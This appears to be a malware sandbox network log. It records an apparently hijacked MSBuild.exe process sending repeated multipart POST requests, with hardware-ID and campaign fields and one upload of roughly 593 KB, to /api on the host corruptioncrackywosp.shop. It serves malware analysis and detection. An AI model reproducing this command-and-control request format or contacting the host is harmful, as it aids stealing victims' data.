name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:45 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gv2j8toni7iq7u7ot3g0fcmkro; expires=Sat, 21-Sep-2024 01:18:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJJpJWSctjtmZgBMxhW%2FDLFa8J1UGRvrzVrIzccBhWo6ZCawWtlGnjIpXx2fvoxqi%2B6rAFPsSMrD92X2HYVGhbPAsZQt9NkJdbEfwadC24V%2FgDoCspDcoM%2BdxBLGIAik2KuOJcAFFV8AldAt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8bfacfc84263-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-28 07:31:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49710	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:45 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20573 Host: corruptioncrackywosp.shop
2024-05-28 07:31:45 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:45 UTC	5242	OUT	Data Raw: b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-05-28 07:31:46 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6moii2i72o32hjdc4h1e3s9s0j; expires=Sat, 21-Sep-2024 01:18:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiwDdvcftlVp7SaEF3XvF6GX6EiZ%2BARrZaWjjh%2Fm%2B3pC%2B738zSAsD%2F8zO2cxfd3SVP6Qo3R9qILjSziSl1YgLWwi0SEA2%2FDMHmN7B1pZgTqq%2FUWj3EUnfLt9h8Dc3lBnKfbPy2jvNQPUTmPe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8c03899f4364-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-28 07:31:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49711	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:46 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7094 Host: corruptioncrackywosp.shop
2024-05-28 07:31:46 UTC	7094	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:47 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a91dt6dmjl7b4ifu9enolidpf3; expires=Sat, 21-Sep-2024 01:18:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTRtt%2FlgG8eiaSwNQK0sXJdVLSrURd1HNl0BMuriRxoMSZmgCTciphzZrDDUsuSJrQSqKamgy3ETV3QZ17s%2F2Mgl049vLzXIZJR1Qir9UnTWxJRbK9Vu7sJOZSTWmVIxYvHRANhemQ5U6C5%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8c0a8af818fa-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-28 07:31:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49712	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:47 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1268 Host: corruptioncrackywosp.shop
2024-05-28 07:31:47 UTC	1268	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:48 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t8p4aadnsili1ilogcjtj5m753; expires=Sat, 21-Sep-2024 01:18:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FkTTAdGWnXFBgsKMI2GfpQn%2BplqwIPHgDSvdrdErHKReF9oK6b%2F9KdMTx4sMkHQ8Z%2FkBE1Az3XwHN0BIPHT6COrXyqtcogCW9VB8t8gSd4QgoYqv6hXJcL05UAt0DScKPDl5uGZIdmnR7T1Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8c10be13c329-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-28 07:31:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49713	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:49 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 593089 Host: corruptioncrackywosp.shop
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 29 2d 9e e4 a8 28 07 0b 02 3f 8b b8 e6 00 01 f0 46 c8 4e ad 16 5c 0f 71 3a 30 a6 71 bb 42 74 5d a3 7e 9b b9 f5 48 42 40 5e 6c 19 4b b8 17 6a ae 17 20 4c 92 22 55 9a bc 0b 2c 2d db b9 5f 9e 56 6e 12 24 a4 77 be 7a 5c c8 c2 48 15 f6 3d f8 84 f9 ae d0 a1 8f cb 13 a7 95 a3 ab 04 81 58 e5 e4 f3 7c 40 9d 6a c0 6a 97 9f 5a 70 e8 35 f8 f5 74 b5 d2 f5 3f 39 14 2c ce 19 79 fd 20 d4 55 94 b5 f8 9b da fe 18 fe e8 04 03 f8 a2 7c ab ed 41 79 1b e4 e7 7e 01 3b 37 66 c7 33 5d d6 ff fc 41 99 3b b3 ca ef 6e 25 30 d9 0d c9 23 a3 f7 c6 1e b0 1f e9 2a 75 0a ec cd 7f 0b 6d 47 5d 1e 03 76 c9 97 ff 6d e8 ac ab 46 f8 41 07 98 c3 21 62 93 9a 8f 00 8e 57 22 40 92 69 da 60 8e c6 fa 27 b3 0a 28 01 92 28 ee 0e 4a c8 fe 38 78 6b 93 72 a1 d3 0e 62 ee 93 eb 17 06 8e 0f 32 9d 7d 70 a0 65 Data Ascii: )-(?FN\q:0qBt]~HB@^lKj L"U,-_Vn$wz\H=X\|@jjZp5t?9,y U\|Ay~;7f3]A;n%0#*umG]vmFA!bW"@i`'((J8xkrb2}pe
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 44 f9 7e d9 34 36 d0 a0 ec 35 bd b3 ec d7 fd f7 e1 7e d9 71 b1 b1 1b 5a e7 91 8f eb e6 39 88 f0 5c 97 45 9f e7 e8 a2 8e ae c9 32 2f ec 6c 47 ff b5 87 90 4d 5b 20 b6 7d 30 97 fa 35 aa 44 17 7b 9b 4f 99 15 f4 15 00 67 b7 e9 41 ee 9d 1d 33 0c a7 cd ca 81 a5 ca 1d 0b f6 07 78 ed 43 c1 e3 89 0b 37 15 2f d3 eb d6 e7 17 07 cd f4 16 57 74 e8 7f b4 00 62 e7 62 d4 11 ad a0 9c 4c ff 17 26 1b 53 4f 9d af 0e 27 a8 ec ad 9e a9 ef 36 d9 93 55 b5 0d 0d 3f 60 10 29 49 28 10 6f e6 d5 56 63 3d c8 90 e7 86 f2 ba e9 43 ff 7b 4e e5 69 40 df fd 5b 7b 3c f4 82 40 c4 05 10 3e 74 33 dc 03 b0 65 9f 02 70 d2 0c f4 87 83 fe eb 33 3e c8 b7 c5 80 c2 73 e2 36 ff ef e1 3c 49 47 05 6c 5e 8b 22 e8 59 10 6a ac 68 62 08 00 3c 46 b8 19 64 35 d4 56 37 35 96 a3 03 98 0f 6a 46 6a ad 39 58 59 1a Data Ascii: D~465~qZ9\E2/lGM[ }05D{OgA3xC7/WtbbL&SO'6U?`)I(oVc=C{Ni@[{<@>t3ep3>s6<IGl^"Yjhb<Fd5V75jFj9XY
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 22 78 f8 39 ec a4 ac d2 f5 41 bb 9e 12 da 09 58 56 e5 9a 18 bf 55 dd 11 33 43 e5 af 4a f7 32 41 7b 99 60 b1 b4 1d 53 c8 01 58 ea 64 87 d6 00 1e 65 1b f5 89 15 15 04 b9 a8 0f 22 15 e3 c5 d1 7b 76 b3 0b 8f 32 f9 0e 1f 19 af a0 2b cc b4 64 c9 2b 29 38 87 39 80 2b b0 cc 3a 23 7f 01 87 d8 5e 63 d0 e0 72 0b e1 77 8f 7e 66 3b 99 eb 94 ea c1 93 fc 14 4e eb 0a 93 e2 c0 bf b0 f2 15 bb b1 52 ff ea 80 d5 b2 8a 6f aa a4 2d b5 00 c7 94 ea e7 27 1f fc e0 1c 04 47 42 2e 89 00 de a6 0c 12 69 48 90 06 76 29 17 33 02 85 9a ec 8d 1d d5 7c b3 82 2c a5 6b ba cb 00 61 ff b6 56 d4 3c 7b a1 44 f0 b5 18 10 3d 78 75 c4 51 19 6c f4 70 82 39 92 dc d5 59 9f a2 0f ac 69 21 ce 16 ba 62 5d 95 5a 96 c3 8d fc e6 d7 f3 99 3d 59 30 df 1a 6c 56 ef fd 87 6b f0 95 1b df 23 40 53 05 3d 85 b7 27 Data Ascii: "x9AXVU3CJ2A{`SXde"{v2+d+)89+:#^crw~f;NRo-'GB.iHv)3\|,kaV<{D=xuQlp9Yi!b]Z=Y0lVk#@S='
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 72 29 27 15 ba f9 f2 92 84 17 da 1a a3 26 f9 fd e8 0d 39 c9 c4 ef 38 34 d0 92 10 8c 8d d9 83 f1 62 5d 64 a0 da 63 42 4d 4d cb 61 a5 07 a3 4e 2a c8 ac ef 6b 1f ab d6 e7 98 7a b7 eb 23 f8 b8 83 4e f8 8e f7 1f 96 d9 9e ff c4 c0 cb ef be 9e 33 91 1d eb 72 a7 e8 f3 69 5d 91 fb 0f f5 08 0e 0e b4 9e c6 9b 87 88 c3 fb 9b 35 c2 09 07 0f cf fc a6 1d b5 cc 89 4c 64 c4 17 18 0b 8c 8b d5 d8 eb e6 2d 9c 19 cd d2 17 f0 f2 d5 90 8f e6 5f c9 ef 50 3f be bb 1d 8e 17 d8 a5 75 f9 34 31 33 02 ff fc 5e 7b 57 ee 32 a7 44 f0 c4 bc cf 65 e7 28 cc 30 74 4f 1e 23 28 85 58 6f c8 0c 66 17 6b e4 be 90 c2 63 ce 81 bc 3d 82 51 ca 94 8a 8b 76 fd 51 88 85 c4 d9 5a 7d 45 ef ff 3b 55 ff ff bb 40 2a 64 79 02 26 04 07 56 eb 68 8a 3e d0 82 43 e3 31 fd e0 6d 2b 48 25 d6 e1 12 10 08 ce 99 34 ae Data Ascii: r)'&984b]dcBMMaNkz#N3ri]5Ld-_P?u413^{W2De(0tO#(Xofkc=QvQZ}E;U@dy&Vh>C1m+H%4
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: f7 b4 17 4e 98 76 b2 33 a0 bf 0c 85 cf 0a 54 09 21 99 24 3e af 36 e8 e1 75 68 4a 7d be 70 f5 8b f9 7e aa 15 f7 29 17 95 f4 7f 84 88 97 cc a1 fa 6e a9 97 f4 94 9d 8e 3a 93 ef 9e b0 73 ad 8b 16 d3 ad 4f 43 78 f8 d2 53 23 78 91 ff 4f 3e 26 c2 88 74 7f 97 67 70 1a da 4c a1 f2 b2 1f 3b a5 3f 7c 38 ae c5 e1 8f 21 0f c6 7d 31 aa 96 f6 c4 c5 d3 6f 2d a5 9a 7c 12 7e f2 3a fe d8 8b 21 02 2f ba ce 7c 5d 6e b8 32 11 17 1d c8 0b dc 1b 2c 64 68 3a 59 88 87 26 3f d5 c2 5a 01 03 62 a6 3a 04 41 dc cb c2 4b 8a 13 c3 41 94 5e b5 99 fe 30 13 95 9f 0d 6b e6 a0 de 52 2d 29 34 01 8d 2f 59 22 18 e8 a3 57 36 ce f8 a7 fc 99 4e 8e dd ee 99 57 5b fa 19 10 9c d6 0d df b9 4c 71 49 af b8 db 58 04 d9 3c 4f 2d dd 2a 38 ba 07 03 2e 59 ff fd 9a 91 7b 09 d4 07 96 02 24 77 c5 2c f7 04 4a f4 Data Ascii: Nv3T!$>6uhJ}p~)n:sOCxS#xO>&tgpL;?\|8!}1o-\|~:!/\|]n2,dh:Y&?Zb:AKA^0kR-)4/Y"W6NW[LqIX<O-*8.Y{$w,J
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: cc 31 2c 0c c2 bb 5c e1 2a 66 39 33 7e e1 b0 97 a8 5e bc d7 de 0f 05 f7 c5 e9 02 0b 02 6a 71 2a 74 9e 45 e1 95 ee 0b 44 ad 6d 1f fe 66 c2 c0 a0 55 a4 67 cc b2 d0 82 23 61 5d c7 30 af f3 20 78 a3 a4 46 98 5b 1c 5f cc ae d6 8b c5 4d 5b 0d 98 49 a3 29 ff d2 52 57 d0 57 98 aa 91 a2 0c ab c5 14 9a 09 20 36 92 e1 72 bb af 7e 46 71 e4 4a c5 ad ae ef 34 d9 ed 8c a6 81 f6 37 49 da fe a5 de 9c 59 0f 8e 1f 63 61 fe 03 6d d5 e3 f5 0f 8d f9 9f 80 92 e9 b7 9e 6c f0 14 45 df 1b 58 7a a1 6b 5b 0c 4d b7 b8 e5 e3 7a 0d 78 9a 68 83 85 c6 0d 87 3b 63 df 39 42 c5 d4 2c 5c a8 39 2f 60 17 5f cb 7c da 9e b3 91 f2 dd 4e 05 ca b6 cd f4 fd ee 9f 81 01 23 5f d1 9c fc 97 17 41 66 8b 15 2f 78 3f c8 05 17 9e f8 9a f4 c1 ff 3a 52 a2 d2 03 02 85 4a 98 2b 01 21 7c 1b a2 33 0f 6f f2 ae 9b Data Ascii: 1,\f93~^jqtEDmfUg#a]0 xF[_M[I)RWW 6r~FqJ47IYcamlEXzk[Mzxh;c9B,\9/`_\|N#_Af/x?:RJ+!\|3o
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 67 38 35 fb d7 7a c8 df cf 0e 70 ec 52 d9 bd 37 ae 20 19 7b 4e 14 f1 f1 6a fd bf 9c 52 33 c4 ba dc 91 e8 c3 3b 1d 9e 0e b6 b8 05 13 03 87 2e 77 fa fc c8 86 10 7c 36 99 87 04 03 9a ba 24 9e d7 5c 8a 89 1c ea de ab 90 b4 da a6 ac 93 0c 70 05 ae 5b 53 e8 9f 28 77 9d 62 14 f3 30 38 0a b1 72 29 9c d9 81 05 9a c2 07 c1 59 86 74 14 ed 1d 60 04 e3 88 7c ec a2 9d c0 56 37 e0 d2 8f db c6 0c 75 61 b0 a7 1e 56 c7 2a 1c 05 b6 12 e8 bc 6c 99 f6 29 41 f0 b7 50 31 16 74 c4 83 06 90 59 53 25 72 85 ff fc 1e 9c da 6d ee 9b da 96 d2 cd c9 d7 4a a0 7d 55 e3 c8 aa f6 c5 a6 7d c6 02 08 d7 ef 14 41 a8 f0 11 cc b7 d9 7d 11 67 0e 87 24 86 ed 48 fb c1 6f 09 a7 3c 88 79 01 70 e4 3c c1 45 30 d1 ee 2a 66 b9 35 14 4d 52 e5 a6 1d 7c 05 c2 92 29 13 c9 41 b2 a8 17 7a a8 fd e2 e0 0d d2 0a Data Ascii: g85zpR7 {NjR3;.w\|6$\p[S(wb08r)Yt`\|V7uaVl)AP1tYS%rmJ}U}A}g$Ho<yp<E0f5MR\|)Az
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 05 ce 8d 1d be 38 3a 4a 8d d6 7b 75 ad 89 42 49 7d 80 25 04 56 ec 91 28 f1 f6 47 2c d4 af d4 54 28 e0 ca d7 d9 42 7c 97 13 c9 68 b8 f3 03 c4 ec e0 03 4f 02 fe e7 38 08 2d 51 04 af 1f e3 c9 1f 1e 39 fc b2 60 0c f1 6c 0c db b3 c5 a1 bf 9f 13 f4 c0 04 a7 d6 07 35 23 0d 64 08 99 b0 21 c2 b0 79 b1 56 4c 93 5b 1a fe e1 d0 95 d5 c3 33 24 7b 01 f1 99 53 8e 30 08 d7 79 f8 a3 04 d6 c1 08 6d 57 f8 70 a2 6a 92 ef c3 19 6c ea 91 88 4b 52 04 c9 51 f0 a5 97 f4 96 c9 77 88 da d2 bc 56 88 23 76 6e 4e 9d d3 0b 0d 47 20 5e 2e 45 e5 91 0c 3b c3 ec 45 2e aa 56 eb 4a 33 07 f9 87 a7 8c 16 d6 a8 db c7 0b 45 c8 15 cd df 84 8f f3 00 f4 66 01 5b da 03 0e 7d c9 1e e5 c3 35 3e a4 98 d3 f8 81 7f 73 46 33 e2 85 20 6e ee 5a 6c 6d 86 e8 3b c6 24 aa 6e 93 c4 a8 26 e6 6b f8 cf 5e 79 16 eb Data Ascii: 8:J{uBI}%V(G,T(B\|hO8-Q9`l5#d!yVL[3${S0ymWpjlKRQwV#vnNG ^.E;E.VJ3Ef[}5>sF3 nZlm;$n&k^y
2024-05-28 07:31:49 UTC	15331	OUT	Data Raw: 79 9d e1 d2 42 c8 4c 73 c9 d7 a8 af b3 2b bb 52 8a 4b be f6 df 48 d2 08 ae fd 76 61 f5 d5 93 69 68 30 57 7a 60 85 38 e7 1f 30 92 fb 72 e6 7e 59 4a f1 b6 6b 8e e3 89 4f 57 e3 3a 6b 8d 1b 02 15 f5 07 5d 3e 0d ac 92 3c 83 80 8e 04 cf bf 7c 35 e8 ac 4a d4 71 80 28 55 8c 5e 22 04 7f fe 53 2d 1f 89 45 c4 d7 6d 2c f5 03 e8 9a e5 6d b3 f7 17 ef ce c7 a1 42 e6 b4 3f 97 e4 bd be 55 6a 88 43 49 a0 70 28 21 94 8e 50 46 c2 ef 7f de 1a e2 ca 27 6b 51 9b 8e 11 f5 4c 51 c7 91 c9 9f 79 d7 2f 95 de 98 28 cb f3 fb 57 ff b0 b7 21 99 64 52 7d 52 14 ab 09 64 a2 c2 9e 2f 5c c2 ff dd aa a1 7f 19 d0 75 cf a9 34 a8 0b 83 a9 ea 2a 0e 60 c8 79 b9 80 2e 77 3e e6 43 04 7c 24 33 5f 09 6c 9f 7e cb bb 09 b8 06 99 d6 b7 d9 a5 73 f9 60 fd 9c 2a 85 c8 07 f6 ed 52 ff ff b1 74 ee f1 4c fe ff Data Ascii: yBLs+RKHvaih0Wz`80r~YJkOW:k]><\|5Jq(U^"S-Em,mB?UjCIp(!PF'kQLQy/(W!dR}Rd/\u4`y.w>C\|$3_l~s`RtL
2024-05-28 07:31:53 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pujvu6hp5qt7aj8h15l29hdosf; expires=Sat, 21-Sep-2024 01:18:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tb3a4oYqqYM9S4aYgCeDcBv6VXYl46FV61SexrC%2F8E0iNHbQMI2fsh415xbvQ58faGVojmaP%2FVtMhd3TiM24xgxAwoQZz6cVA93KeRKlXidcHOIEzxXsTgOHmeTHjkTyLLL9ibmSlv1955T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8c1b69121a34-EWR alt-svc: h3=":443"; ma=86400

